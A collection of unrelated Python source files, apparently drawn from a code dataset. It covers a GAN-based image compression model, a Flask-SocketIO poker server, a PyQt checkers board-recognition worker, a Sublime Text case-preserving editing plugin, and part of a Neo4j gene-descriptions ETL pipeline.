weighted_distortion = self.args.k_M * distortion_loss
weighted_perceptual = self.args.k_P * perceptual_loss
weighted_rate, rate_penalty = losses.weighted_rate_loss(self.args, total_nbpp=intermediates.n_bpp,
total_qbpp=intermediates.q_bpp, step_counter=self.step_counter, ignore_schedule=self.args.ignore_schedule)
weighted_R_D_loss = weighted_rate + weighted_distortion
weighted_compression_loss = weighted_R_D_loss + weighted_perceptual
# Bookkeeping
if (self.step_counter % self.log_interval == 1):
self.store_loss('rate_penalty', rate_penalty)
self.store_loss('distortion', distortion_loss.item())
self.store_loss('perceptual', perceptual_loss.item())
self.store_loss('n_rate', intermediates.n_bpp.item())
self.store_loss('q_rate', intermediates.q_bpp.item())
self.store_loss('n_rate_latent', hyperinfo.latent_nbpp.item())
self.store_loss('q_rate_latent', hyperinfo.latent_qbpp.item())
self.store_loss('n_rate_hyperlatent', hyperinfo.hyperlatent_nbpp.item())
self.store_loss('q_rate_hyperlatent', hyperinfo.hyperlatent_qbpp.item())
self.store_loss('weighted_rate', weighted_rate.item())
self.store_loss('weighted_distortion', weighted_distortion.item())
self.store_loss('weighted_perceptual', weighted_perceptual.item())
self.store_loss('weighted_R_D', weighted_R_D_loss.item())
self.store_loss('weighted_compression_loss_sans_G', weighted_compression_loss.item())
return weighted_compression_loss
def GAN_loss(self, intermediates, train_generator=False):
"""
train_generator: Flag to send gradients to generator
"""
disc_out = self.discriminator_forward(intermediates, train_generator)
D_loss = self.gan_loss(disc_out, mode='discriminator_loss')
G_loss = self.gan_loss(disc_out, mode='generator_loss')
# Bookkeeping
if (self.step_counter % self.log_interval == 1):
self.store_loss('D_gen', torch.mean(disc_out.D_gen).item())
self.store_loss('D_real', torch.mean(disc_out.D_real).item())
self.store_loss('disc_loss', D_loss.item())
self.store_loss('gen_loss', G_loss.item())
self.store_loss('weighted_gen_loss', (self.args.beta * G_loss).item())
return D_loss, G_loss
def compress(self, x, silent=False):
"""
* Pass image through encoder to obtain latents: x -> Encoder() -> y
* Pass latents through hyperprior encoder to obtain hyperlatents:
y -> hyperencoder() -> z
* Encode hyperlatents via nonparametric entropy model.
* Pass hyperlatents through mean-scale hyperprior decoder to obtain mean,
scale over latents: z -> hyperdecoder() -> (mu, sigma).
* Encode latents via entropy model derived from (mean, scale) hyperprior output.
"""
assert self.model_mode == ModelModes.EVALUATION and (self.training is False), (
f'Set model mode to {ModelModes.EVALUATION} for compression.')
spatial_shape = tuple(x.size()[2:])
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_encoder_downsamples = self.Encoder.n_downsampling_layers
factor = 2 ** n_encoder_downsamples
x = utils.pad_factor(x, x.size()[2:], factor)
# Encoder forward pass
y = self.Encoder(x)
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_hyperencoder_downsamples = self.Hyperprior.analysis_net.n_downsampling_layers
factor = 2 ** n_hyperencoder_downsamples
y = utils.pad_factor(y, y.size()[2:], factor)
compression_output = self.Hyperprior.compress_forward(y, spatial_shape)
attained_hbpp = 32 * len(compression_output.hyperlatents_encoded) / np.prod(spatial_shape)
attained_lbpp = 32 * len(compression_output.latents_encoded) / np.prod(spatial_shape)
attained_bpp = 32 * ((len(compression_output.hyperlatents_encoded) +
len(compression_output.latents_encoded)) / np.prod(spatial_shape))
if silent is False:
self.logger.info('[ESTIMATED]')
self.logger.info(f'BPP: {compression_output.total_bpp:.3f}')
self.logger.info(f'HL BPP: {compression_output.hyperlatent_bpp:.3f}')
self.logger.info(f'L BPP: {compression_output.latent_bpp:.3f}')
self.logger.info('[ATTAINED]')
self.logger.info(f'BPP: {attained_bpp:.3f}')
self.logger.info(f'HL BPP: {attained_hbpp:.3f}')
self.logger.info(f'L BPP: {attained_lbpp:.3f}')
return compression_output
def decompress(self, compression_output):
"""
* Recover z* from compressed message.
* Pass recovered hyperlatents through mean-scale hyperprior decoder obtain mean,
scale over latents: z -> hyperdecoder() -> (mu, sigma).
* Use latent entropy model to recover y* from compressed image.
* Pass quantized latent through generator to obtain the reconstructed image.
y* -> Generator() -> x*.
"""
assert self.model_mode == ModelModes.EVALUATION and (self.training is False), (
f'Set model mode to {ModelModes.EVALUATION} for decompression.')
latents_decoded = self.Hyperprior.decompress_forward(compression_output, device=utils.get_device())
# Use quantized latents as input to G
reconstruction = self.Generator(latents_decoded)
if self.args.normalize_input_image is True:
reconstruction = torch.tanh(reconstruction)
# Undo padding
image_dims = compression_output.spatial_shape
reconstruction = reconstruction[:, :, :image_dims[0], :image_dims[1]]
if self.args.normalize_input_image is True:
# [-1.,1.] -> [0.,1.]
reconstruction = (reconstruction + 1.) / 2.
reconstruction = torch.clamp(reconstruction, min=0., max=1.)
return reconstruction
def forward(self, x, train_generator=False, return_intermediates=False, writeout=True):
self.writeout = writeout
losses = dict()
if train_generator is True:
# Define a 'step' as one cycle of G-D training
self.step_counter += 1
intermediates, hyperinfo = self.compression_forward(x)
if self.model_mode == ModelModes.EVALUATION:
reconstruction = intermediates.reconstruction
if self.args.normalize_input_image is True:
# [-1.,1.] -> [0.,1.]
reconstruction = (reconstruction + 1.) / 2.
reconstruction = torch.clamp(reconstruction, min=0., max=1.)
return reconstruction, intermediates.q_bpp
compression_model_loss = self.compression_loss(intermediates, hyperinfo)
if self.use_discriminator is True:
# Only send gradients to generator when training generator via
# `train_generator` flag
D_loss, G_loss = self.GAN_loss(intermediates, train_generator)
weighted_G_loss = self.args.beta * G_loss
compression_model_loss += weighted_G_loss
losses['disc'] = D_loss
losses['compression'] = compression_model_loss
# Bookkeeping
if (self.step_counter % self.log_interval == 1):
self.store_loss('weighted_compression_loss', compression_model_loss.item())
if return_intermediates is True:
return losses, intermediates
else:
return losses
if __name__ == '__main__':
compress_test = False
if compress_test is True:
model_mode = ModelModes.EVALUATION
else:
model_mode = ModelModes.TRAINING
logger = utils.logger_setup(logpath=os.path.join(directories.experiments, 'logs'), filepath=os.path.abspath(__file__))
device = utils.get_device()
logger.info(f'Using device {device}')
storage_train = defaultdict(list)
storage_test = defaultdict(list)
model = Model(hific_args, logger, storage_train, storage_test, model_mode=model_mode, model_type=ModelTypes.COMPRESSION_GAN)
model.to(device)
logger.info(model)
transform_param_names = list()
transform_params = list()
logger.info('ALL PARAMETERS')
for n, p in model.named_parameters():
if ('Encoder' in n) or ('Generator' in n):
transform_param_names.append(n)
transform_params.append(p)
if ('analysis' in n) or ('synthesis' in n):
transform_param_names.append(n)
transform_params.append(p)
logger.info(f'{n} - {p.shape}')
logger.info('AMORTIZATION PARAMETERS')
amortization_named_parameters = itertools.chain.from_iterable(
[am.named_parameters() for am in model.amortization_models])
for n, p in amortization_named_parameters:
logger.info(f'{n} - {p.shape}')
logger.info('AMORTIZATION PARAMETERS')
for n, p in zip(transform_param_names, transform_params):
logger.info(f'{n} - {p.shape}')
logger.info('HYPERPRIOR PARAMETERS')
for n, p in model.Hyperprior.hyperlatent_likelihood.named_parameters():
logger.info(f'{n} - {p.shape}')
if compress_test is False:
logger.info('DISCRIMINATOR PARAMETERS')
for n, p in model.Discriminator.named_parameters():
logger.info(f'{n} - {p.shape}')
logger.info("Number of trainable parameters: {}".format(utils.count_parameters(model)))
logger.info("Estimated size: {} MB".format(utils.count_parameters(model) * 4. / 10**6))
B = 10
shape = [B, 3, 256, 256]
x = torch.randn(shape).to(device)
start_time = time.time()
if compress_test is True:
model.eval()
logger.info('Starting compression with input shape {}'.format(shape))
compression_output = model.compress(x)
reconstruction = model.decompress(compression_output)
logger.info(f"n_bits: {compression_output.total_bits}")
logger.info(f"bpp: {compression_output.total_bpp}")
logger.info(f"MSE: {torch.mean(torch.square(reconstruction - x)).item()}")
else:
logger.info('Starting forward pass with input shape {}'.format(shape))
losses = model(x)
compression_loss, disc_loss = losses['compression'], losses['disc']
logger.info('Delta t {:.3f}s'.format(time.time() - start_time))
|
<reponame>liona24/pokerv
from collections import defaultdict
from flask import Flask, render_template, request
from flask_socketio import SocketIO, emit, join_room,\
leave_room, close_room
from gameplay import Room, HumanPlayer, AiPlayer
import serialization as ser
app = Flask(__name__,
static_folder='../dist/static',
template_folder='../dist',
instance_relative_config=True)
app.config.from_object('settings')
app.config.from_envvar('SERVER_SETTINGS', silent=True)
socketio = SocketIO(app)
rooms = {}
# stores temporary lock events which are used to wake the gameplay thread
# access through event_storage[room_name][name]
# each 'event' consists of an threading.Event and associated data
event_storage = defaultdict(dict)
def response(status, code, msg):
return { 'status': status, 'code': code, 'msg': msg }
def hand_finished(summary, room):
socketio.emit('hand finished', ser.serialize_summary(summary), room=room)
def update_players(room):
socketio.emit('players changed', { 'players': room.serialize_players() },
room=room.name)
@app.route('/', methods=[ 'GET' ])
def index():
return render_template('index.html')
@socketio.on('playpause')
def play_pause(args):
room = args['room']
play = args['play'] # check if this is actually casting correctly
try:
if play:
return response(
*rooms[room].start_game(lambda s: hand_finished(s, room)))
else:
return response(*rooms[room].stop_game())
except KeyError:
return response('err', 404, "The specified room does not exist!")
@socketio.on('move')
def move(args):
room = args['room']
name = args['name']
event = event_storage[room].pop(name, None)
if event is None:
return response('err', 404, "It is not '%s's turn!" % name)
event.data.update(args)
event.set()
return response('ok', 200, None)
@socketio.on('create')
def create(args):
room = args['room']
size = int(args['size'])
blinds = (int(args['smallblind']), int(args['bigblind']))
initstack = int(args['stacksize'])
if room not in rooms:
rooms[room] = Room(room, size, initstack, blinds)
emit('message', "Created room '%s'!" % room, room=request.sid)
return response('ok', 200, None)
return response('err', 404, 'The desired room is already in use!')
@socketio.on('join')
def join(args):
room_name = args['room']
user_name = args['user']
player_type = args['player_type']
try:
room = rooms[room_name]
typ = HumanPlayer if player_type == 'human' else AiPlayer
player = typ(user_name,
room.initstack,
request.sid,
room,
socketio,
event_storage)
status, errno, msg = room.join(player)
if status == 'ok':
join_room(room_name)
emit('message', 'Player %s entered the table!' % user_name,
room=room_name)
update_players(room)
return response(status, errno, msg)
except KeyError:
return response('err', 404, 'This room does not exist!')
@socketio.on('leave')
def leave(args):
room = args['room']
user = args['user']
if room in rooms:
status, errno, msg = rooms[room].leave(user)
if status == 'ok':
leave_room(room)
if rooms[room].isempty:
close_room(room)
rooms.pop(room)
else:
emit('message',
"Player '%s' left the table!" % user,
room=room)
update_players(rooms[room])
return response(status, errno, msg)
return response('err', 404, 'This room does not exist!')
if __name__ == '__main__':
socketio.run(app, debug=app.config['DEBUG'])
|
<filename>checkers/gui/worker.py
import urllib.request
import cv2
import numpy as np
from PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot, Qt
from PyQt5.QtGui import QImage
from checkers.image.board import detect_board, create_board_matrix
from checkers.image.pawn_colour import PawnColour, opposite
from checkers.logic.move import check_move
from checkers.logic.move_status import MoveStatus
class Worker(QObject):
new_board_ready_signal = pyqtSignal(np.ndarray)
new_image_ready_signal = pyqtSignal(QImage)
new_label_ready_signal = pyqtSignal(str)
new_pawns_label_ready_signal = pyqtSignal(str)
new_button_label_ready_signal = pyqtSignal(str)
def __init__(self, parent=None):
QObject.__init__(self, parent=parent)
self.should_emit = False
self.before_matrix = None
self.after_matrix = None
self.player_colour = PawnColour.WHITE
@pyqtSlot()
def capture_video(self):
url = 'http://192.168.1.58:8080/shot.jpg'
while True:
img_response = urllib.request.urlopen(url)
img_np = np.array(bytearray(img_response.read()), dtype=np.uint8)
image = cv2.imdecode(img_np, -1)
rgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
h, w, ch = rgb_image.shape
bytes_per_line = ch * w
q_image = QImage(rgb_image.data, w, h, bytes_per_line, QImage.Format_RGB888)
q_image = q_image.scaled(640, 480, Qt.KeepAspectRatio)
self.new_image_ready_signal.emit(q_image)
if self.should_emit:
print('Click!')
self.before_matrix = self.after_matrix
board = detect_board(image)
if board is not None:
self.after_matrix = create_board_matrix(board)
if self.before_matrix is not None:
self.__make_move()
else:
self.emit_new_board(self.after_matrix)
self.emit_new_pawns_label(self.count_pawns_and_display(self.after_matrix))
self.emit_new_label('Make a move - white turn')
self.emit_new_button_label('Update the board')
self.should_emit = False
@pyqtSlot(np.ndarray)
def emit_new_board(self, board):
self.new_board_ready_signal.emit(board)
def set_should_emit(self):
self.should_emit = True
@pyqtSlot(str)
def emit_new_label(self, text):
self.new_label_ready_signal.emit(text)
@pyqtSlot(str)
def emit_new_pawns_label(self, text):
self.new_pawns_label_ready_signal.emit(text)
@pyqtSlot(str)
def emit_new_button_label(self, text):
self.new_button_label_ready_signal.emit(text)
def __make_move(self):
move = check_move(self.before_matrix, self.after_matrix, self.player_colour)
if move == MoveStatus.CORRECT:
self.emit_new_board(self.after_matrix)
self.player_colour = opposite(self.player_colour)
self.emit_new_label('Correct move - ' + str(self.player_colour)[11:].lower() + ' turn')
self.emit_new_pawns_label(self.count_pawns_and_display(self.after_matrix))
elif move == MoveStatus.INCORRECT:
self.emit_new_label('Incorrect move - ' + str(self.player_colour)[11:].lower() + ' turn')
self.after_matrix = self.before_matrix
elif move == MoveStatus.UNDEFINED:
self.emit_new_label('Undefined move - ' + str(self.player_colour)[11:].lower() + ' turn')
self.after_matrix = self.before_matrix
elif move == MoveStatus.GAME_OVER:
self.emit_new_board(self.after_matrix)
self.player_colour = PawnColour.WHITE
self.emit_new_label('Game over - ' + str(self.player_colour)[11:].lower() + ' wins')
self.emit_new_button_label('Start over')
self.emit_new_pawns_label(self.count_pawns_and_display(self.after_matrix))
self.after_matrix = None
elif move == MoveStatus.NO_CHANGE:
self.emit_new_label('No change detected - ' + str(self.player_colour)[11:].lower() + ' turn')
@staticmethod
def count_pawns_and_display(board):
white_pawns_count = 0
black_pawns_count = 0
for i in np.nditer(board):
if i == 1:
black_pawns_count += 1
if i == 2:
white_pawns_count += 1
return "White pawns count: " + str(white_pawns_count) + " \t Black pawns count: " + str(black_pawns_count)
|
'''
_|_. _ _ | _. _ _
| || | ||<| || |_\
sublime text case-preserved multiple editing
author: <NAME>
contact: <EMAIL>
version: 0.1a
issues:
- undo is not working correctly
- probably destroys all other plugins in its wake
- needs tests and extensive testing
- it will delete your entire file if you sneeze
I accept no responsibility for this plugin destroying your computer etc
'''
import sublime, sublime_plugin, random, string
'''
example:
Spaghetti
spaghetti
spagHetti
SPAGHETTI
we can change all the spaghettis to
Ravioli
ravioli
Ravioli
RAVIOLI
by using the shift-key on the first letter only (note: the third case speciality in this example will be lost)
Plugin is activated when differing cases are detected.
'''
class MultiLineCasePreserveEditCommand(sublime_plugin.TextCommand):
def run(self, edit, func_input=None):
# Walk through each region in the selection
if func_input:
for item in func_input:
# get region
region = sublime.Region(item[0][0], item[0][1])
# get string
text = self.view.substr(region)
if item[1] == "lower":
text_replace = text.lower()
self.view.replace(edit, region, text_replace)
elif item[1] == "upper":
text_replace = text.upper()
self.view.replace(edit, region, text_replace)
elif item[1] == "mixed":
None
class MultiLineCasePreservation(sublime_plugin.EventListener):
def __init__(self):
self.tracked_selections = []
self.last_selections = []
print("MultiLineCasePreservationPlugin loaded")
def process_selections(self, view, selections):
if(len(selections) > 1):
self.tracked_selections = selections
def on_modified_async(self, view):
current_startings = []
current_endings = []
# get beginning cursor initial_startings
for v in view.sel():
current_startings.append(v.a)
current_endings.append(v.b)
# now lets get all the cursors, and if we have the same amount of cursors, say hi!
# if we have not changed since last time, return
if set(current_startings + current_endings) != set(self.last_selections):
self.last_selections = current_startings + current_endings
cursors_len = len(view.sel())
if (cursors_len == len(self.tracked_selections)):
# cycle through beginnings and ending regions and convert their case according to tracked selections
initial_startings = []
initial_endings = []
regions = []
transforms = []
addings = []
# get beginning cursor initial_startings
for s in self.tracked_selections:
initial_startings.append(min(s['pos']))
initial_endings.append(max(s['pos']))
transforms.append(s['mod'])
# here is the modifiers
for i in range(len(initial_endings)):
addings.append(current_startings[0] - initial_startings[0])
modifier = 0
for i in range(len(initial_startings)):
original_dist = abs(initial_endings[i] - initial_startings[i]) # original length of this content
current_dist = addings[i] # length of this string from beginning
difference = current_dist - original_dist # difference between the string lengths
modifier = difference * (i)
regions.append([[initial_startings[i] + modifier, current_endings[i]], transforms[i], difference])
# place modifications into the editor via TextCommand (have no other way in ST3)
# only run this if we have multiple cases
transform_set = set(transforms)
if len(transform_set) > 1:
view.run_command('multi_line_case_preserve_edit', {"func_input": regions} )
def on_selection_modified_async(self, view):
if len(view.sel()) > 1:
current_selections = []
for s in view.sel():
r = {}
r['pos'] = (s.a, s.b)
region = s
text = view.substr(region)
if(text):
if text.islower():
r['mod'] = 'lower'
elif text.isupper():
r['mod'] = 'upper'
else:
r['mod'] = 'mixed'
current_selections.append(r)
# now, we have all our selections.
self.process_selections(view, current_selections)
else:
if(len(self.tracked_selections) > 1):
self.tracked_selections = [] |
"""Gene Descriptions ETL."""
import copy
import logging
import os
import datetime
import re
import requests
from collections import defaultdict
from etl import ETL
from etl.helpers import Neo4jHelper
from genedescriptions.config_parser import GenedescConfigParser
from genedescriptions.descriptions_writer import DescriptionsWriter
from genedescriptions.gene_description import GeneDescription
from genedescriptions.data_manager import DataManager
from genedescriptions.commons import DataType, Gene
from genedescriptions.precanned_modules import set_gene_ontology_module, set_disease_module, \
set_alliance_human_orthology_module,\
set_expression_module
from ontobio import AssociationSetFactory, Ontology
from transactors import CSVTransactor, Neo4jTransactor
from loader_common import ContextInfo
from data_manager import DataFileManager
from generators.header import create_header
EXPRESSION_PRVD_SUBTYPE_MAP = {'WB': 'WBBT', 'ZFIN': 'ZFA', 'FB': 'FBBT', 'MGI': 'EMAPA'}
class GeneDescriptionsETL(ETL):
"""Gene Descriptions ETL."""
logger = logging.getLogger(__name__)
# Query templates which take params and will be processed later
gene_descriptions_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (o:Gene)
WHERE o.primaryKey = row.genePrimaryKey
SET o.automatedGeneSynopsis = row.geneDescription"""
# Querys which do not take params and can be used as is
get_all_genes_query = """
MATCH (g:Gene)
WHERE g.dataProvider = {parameter} AND NOT g.primaryKey CONTAINS "HGNC:"
RETURN g.primaryKey, g.symbol"""
get_all_genes_human_query = """
MATCH (g:Gene)
WHERE g.dataProvider = {parameter} AND g.primaryKey CONTAINS "HGNC:"
RETURN g.primaryKey, g.symbol"""
get_gene_disease_annot_query = """
MATCH (d:DOTerm:Ontology)-[r:IS_MARKER_FOR|IS_IMPLICATED_IN|IS_MODEL_OF]-(g:Gene)-[:ASSOCIATION]->
(dga:Association:DiseaseEntityJoin)-[:ASSOCIATION]->(d)
WHERE g.dataProvider = {parameter}
MATCH (dga)-[:EVIDENCE]->(pec:PublicationJoin)-[:ASSOCIATION]-(e:ECOTerm)
RETURN DISTINCT g.primaryKey AS geneId,
g.symbol AS geneSymbol,
d.primaryKey AS TermId,
e.primaryKey AS ECode,
type(r) AS relType,
'D' AS aspect"""
get_feature_disease_annot_query = """
MATCH (d:DOTerm:Ontology)-[r:IS_MARKER_FOR|IS_IMPLICATED_IN|IS_MODEL_OF]-(f)-[:ASSOCIATION]->
(dga:Association:DiseaseEntityJoin)-[:ASSOCIATION]->(d)
WHERE f.dataProvider = {parameter}
MATCH (f)<-[:IS_ALLELE_OF]->(g:Gene)
MATCH (dga)-[:EVIDENCE]->(pec:PublicationJoin)-[:ASSOCIATION]-(e:ECOTerm)
RETURN DISTINCT g.primaryKey AS geneId,
g.symbol AS geneSymbol,
f.primaryKey as alleleId,
d.primaryKey as TermId,
e.primaryKey AS ECode,
type(r) AS relType,
'D' AS aspect"""
get_filtered_human_orthologs_query = """
MATCH (g2)<-[orth:ORTHOLOGOUS]-(g:Gene)-[:ASSOCIATION]->(ogj:Association:OrthologyGeneJoin)-[:ASSOCIATION]->
(g2:Gene)
WHERE ogj.joinType = 'orthologous' AND g.dataProvider = {parameter} AND g2.taxonId ='NCBITaxon:9606' AND
orth.strictFilter = true
MATCH (ogj)-[:MATCHED]->(oa:OrthoAlgorithm)
RETURN g.primaryKey AS geneId,
g2.primaryKey AS orthoId,
g2.symbol AS orthoSymbol,
g2.name AS orthoName,
oa.name AS algorithm"""
get_disease_via_orthology_query = """
MATCH (d:DOTerm:Ontology)-[r:IMPLICATED_VIA_ORTHOLOGY]-(g:Gene)-[:ASSOCIATION]->
(dga:Association:DiseaseEntityJoin)-[:ASSOCIATION]->(d)
WHERE g.dataProvider = {parameter}
MATCH (dga)-[:FROM_ORTHOLOGOUS_GENE]-(orthGene:Gene)
WHERE orthGene.taxonId = 'NCBITaxon:9606'
RETURN DISTINCT g.primaryKey AS geneId,
g.symbol AS geneSymbol,
d.primaryKey AS TermId"""
get_ontology_pairs_query = """
MATCH (term1:{}Term:Ontology)-[r:IS_A|PART_OF]->(term2:{}Term:Ontology)
RETURN term1.primaryKey,
term1.name,
term1.type,
term1.isObsolete,
term2.primaryKey,
term2.name,
term2.type,
term2.isObsolete,
type(r) AS rel_type"""
get_expression_annotations_query = """
MATCH (g:Gene)-[EXPRESSED_IN]->(:ExpressionBioEntity)-[:ANATOMICAL_STRUCTURE|ANATOMICAL_SUB_STRUCTURE]->(t:Ontology)-[:IS_A|PART_OF]->(t2:Ontology)
WHERE g.dataProvider = {parameter}
RETURN g.primaryKey AS geneId,
g.symbol AS geneSymbol,
t.primaryKey AS TermId,
'EXP' AS relType,
'A' AS aspect"""
def __init__(self, config):
"""Initialise object."""
super().__init__()
self.data_type_config = config
self.cur_date = datetime.date.today().strftime("%Y%m%d")
def _load_and_process_data(self):
# create gene descriptions data manager and load common data
context_info = ContextInfo()
data_manager = DataFileManager(context_info.config_file_location)
# go_onto_config = data_manager.get_config('GO')
go_annot_config = data_manager.get_config('GAF')
# do_onto_config = data_manager.get_config('DOID')
go_annot_sub_dict = {sub.get_data_provider(): sub for sub in go_annot_config.get_sub_type_objects()}
this_dir = os.path.split(__file__)[0]
gd_config = GenedescConfigParser(os.path.join(this_dir,
os.pardir,
os.pardir,
"gene_descriptions.yml"))
gd_data_manager = DataManager(do_relations=None, go_relations=["subClassOf", "BFO:0000050"])
gd_data_manager.set_ontology(ontology_type=DataType.GO,
ontology=self.get_ontology(data_type=DataType.GO),
config=gd_config)
gd_data_manager.set_ontology(ontology_type=DataType.DO,
ontology=self.get_ontology(data_type=DataType.DO),
config=gd_config)
# generate descriptions for each MOD
for prvdr in [sub_type.get_data_provider().upper()
for sub_type in self.data_type_config.get_sub_type_objects()]:
gd_config_mod_specific = copy.deepcopy(gd_config)
if prvdr == "WB":
gd_config_mod_specific.config["expression_sentences_options"][
"remove_children_if_parent_is_present"] = True
self.logger.info("Generating gene descriptions for %s", prvdr)
data_provider = prvdr if prvdr != "HUMAN" else "RGD"
json_desc_writer = DescriptionsWriter()
go_annot_path = "file://" + os.path.join(os.getcwd(),
"tmp",
go_annot_sub_dict[prvdr].file_to_download)
gd_data_manager.load_associations_from_file(
associations_type=DataType.GO, associations_url=go_annot_path,
associations_cache_path=os.path.join(os.getcwd(),
"tmp",
"gd_cache",
"go_annot_" + prvdr + ".gaf"),
config=gd_config_mod_specific)
gd_data_manager.set_associations(associations_type=DataType.DO,
associations=self.get_disease_annotations_from_db(
data_provider=data_provider,
gd_data_manager=gd_data_manager,
logger=self.logger),
config=gd_config_mod_specific)
if prvdr in EXPRESSION_PRVD_SUBTYPE_MAP:
gd_data_manager.set_ontology(ontology_type=DataType.EXPR,
ontology=self.get_ontology(data_type=DataType.EXPR,
provider=prvdr),
config=gd_config_mod_specific)
gd_data_manager.set_associations(
associations_type=DataType.EXPR,
associations=self.get_expression_annotations_from_db(data_provider=data_provider,
gd_data_manager=gd_data_manager,
logger=self.logger),
config=gd_config_mod_specific)
commit_size = self.data_type_config.get_neo4j_commit_size()
generators = self.get_generators(prvdr,
gd_data_manager,
gd_config_mod_specific,
json_desc_writer)
query_template_list = [
[self.gene_descriptions_query_template, commit_size,
"genedescriptions_data_" + prvdr + ".csv"]
]
query_and_file_list = self.process_query_params(query_template_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages()
self.save_descriptions_report_files(data_provider=prvdr,
json_desc_writer=json_desc_writer,
context_info=context_info,
gd_data_manager=gd_data_manager)
def get_generators(self, data_provider, gd_data_manager, gd_config, json_desc_writer):
"""Create generators."""
gene_prefix = ""
if data_provider == "HUMAN":
return_set = Neo4jHelper.run_single_parameter_query(self.get_all_genes_human_query,
"RGD")
gene_prefix = "RGD:"
else:
return_set = Neo4jHelper.run_single_parameter_query(self.get_all_genes_query,
data_provider)
descriptions = []
best_orthologs = self.get_best_orthologs_from_db(data_provider=data_provider)
for record in return_set:
gene = Gene(id=gene_prefix + record["g.primaryKey"],
name=record["g.symbol"],
dead=False,
pseudo=False)
gene_desc = GeneDescription(gene_id=record["g.primaryKey"],
gene_name=gene.name,
add_gene_name=False,
config=gd_config)
set_gene_ontology_module(dm=gd_data_manager,
conf_parser=gd_config,
gene_desc=gene_desc, gene=gene)
set_expression_module(df=gd_data_manager,
conf_parser=gd_config,
gene_desc=gene_desc,
gene=gene)
set_disease_module(df=gd_data_manager,
conf_parser=gd_config,
gene_desc=gene_desc,
gene=gene,
human=data_provider == "HUMAN")
if gene.id in best_orthologs:
gene_desc.stats.set_best_orthologs = best_orthologs[gene.id][0]
set_alliance_human_orthology_module(orthologs=best_orthologs[gene.id][0],
excluded_orthologs=best_orthologs[gene.id][1],
gene_desc=gene_desc,
config=gd_config)
if gene_desc.description:
descriptions.append({
"genePrimaryKey": gene_desc.gene_id,
"geneDescription": gene_desc.description
})
json_desc_writer.add_gene_desc(gene_desc)
yield [descriptions]
def get_ontology(self, data_type: DataType, provider=None):
"""Get Ontology."""
ontology = Ontology()
terms_pairs = []
if data_type == DataType.GO:
terms_pairs = Neo4jHelper.run_single_parameter_query(
self.get_ontology_pairs_query.format("GO", "GO"),
None)
elif data_type == DataType.DO:
terms_pairs = Neo4jHelper.run_single_parameter_query(
self.get_ontology_pairs_query.format("DO", "DO"),
None)
elif data_type == DataType.EXPR:
if provider in EXPRESSION_PRVD_SUBTYPE_MAP:
terms_pairs = Neo4jHelper.run_single_parameter_query(
self.get_ontology_pairs_query.format(EXPRESSION_PRVD_SUBTYPE_MAP[provider],
EXPRESSION_PRVD_SUBTYPE_MAP[provider]),
None)
for terms_pair in terms_pairs:
self.add_neo_term_to_ontobio_ontology_if_not_exists(
terms_pair["term1.primaryKey"], terms_pair["term1.name"], terms_pair["term1.type"],
terms_pair["term1.isObsolete"], ontology)
self.add_neo_term_to_ontobio_ontology_if_not_exists(
terms_pair["term2.primaryKey"], terms_pair["term2.name"], terms_pair["term2.type"],
terms_pair["term2.isObsolete"], ontology)
ontology.add_parent(terms_pair["term1.primaryKey"], terms_pair["term2.primaryKey"],
relation="subClassOf" if terms_pair["rel_type"] == "IS_A" else "BFO:0000050")
if data_type == DataType.EXPR and provider == "MGI":
self.add_neo_term_to_ontobio_ontology_if_not_exists("EMAPA_ARTIFICIAL_NODE:99999",
"embryo",
"anatomical_structure",
False,
ontology)
ontology.add_parent("EMAPA_ARTIFICIAL_NODE:99999", "EMAPA:0", relation="subClassOf")
self.add_neo_term_to_ontobio_ontology_if_not_exists("EMAPA_ARTIFICIAL_NODE:99998",
"head",
"anatomical_structure",
False,
ontology)
ontology.add_parent("EMAPA_ARTIFICIAL_NODE:99998", "EMAPA:0", relation="subClassOf")
GeneDescriptionsETL.add_neo_term_to_ontobio_ontology_if_not_exists(
"EMAPA_ARTIFICIAL_NODE:99997",
"gland",
"anatomical_structure",
False,
ontology)
ontology.add_parent("EMAPA_ARTIFICIAL_NODE:99997", "EMAPA:0", relation="subClassOf")
elif data_type == DataType.EXPR and provider == "FB":
GeneDescriptionsETL.add_neo_term_to_ontobio_ontology_if_not_exists(
"FBbt_ARTIFICIAL_NODE:99999",
"organism",
"",
False,
ontology)
ontology.add_parent("FBbt_ARTIFICIAL_NODE:99999",
"FBbt:10000000",
relation="subClassOf")
return ontology
@staticmethod
def add_neo_term_to_ontobio_ontology_if_not_exists(term_id, term_label,
term_type, is_obsolete, ontology):
"""Add NEO Term to Ontobio Ontology If Not Exists."""
if not ontology.has_node(term_id) and term_label:
if is_obsolete in ["true", "True"]:
meta = {"deprecated": True, "basicPropertyValues": [
{"pred": "OIO:hasOBONamespace", "val": term_type}]}
else:
meta = {"basicPropertyValues": [
{"pred": "OIO:hasOBONamespace", "val": term_type}]}
ontology.add_node(id=term_id, label=term_label, meta=meta)
@staticmethod
def create_annotation_record(gene_id, gene_symbol, term_id, aspect, ecode, prvdr, qualifier):
"""Create Annotation Record."""
return {"source_line": "",
"subject": {
"id": gene_id,
"label": gene_symbol,
"type": "gene",
"fullname": "",
"synonyms": [],
"taxon": {"id": ""}
},
"object": {
"id": term_id,
"taxon": ""
},
"qualifiers": [qualifier],
"aspect": aspect,
"relation": {"id": None},
"negated": False,
"evidence": {
"type": ecode,
"has_supporting_reference": "",
"with_support_from": [],
"provided_by": prvdr,
"date": None
}}
@staticmethod
def add_annotations(final_annotation_set, neo4j_annot_set, data_provider,
data_type: DataType, logger, ontology=None):
"""Add Annotations."""
early_conceptus_re = re.compile(r'.*stage conceptus$')
qualifier = ""
for annot in neo4j_annot_set:
if data_type == DataType.DO:
ecodes = ["EXP"] if annot["relType"] != "IS_MARKER_FOR" else ["BMK"]
elif data_type == DataType.EXPR:
ecodes = ["EXP"]
qualifier = "Verified"
# map direct annotations to 'embryo' in mouse or 'organism'
# in fly to a new 'artificial' node to keep
# them but avoid 'embryo' and 'organism' as common ancestors at the same time
if annot["TermId"] == "EMAPA:16039":
annot = {key: value for key, value in annot.items()}
annot["TermId"] = "EMAPA_ARTIFICIAL_NODE:99999"
elif annot["TermId"] == "EMAPA:31858":
annot = {key: value for key, value in annot.items()}
annot["TermId"] = "EMAPA_ARTIFICIAL_NODE:99998"
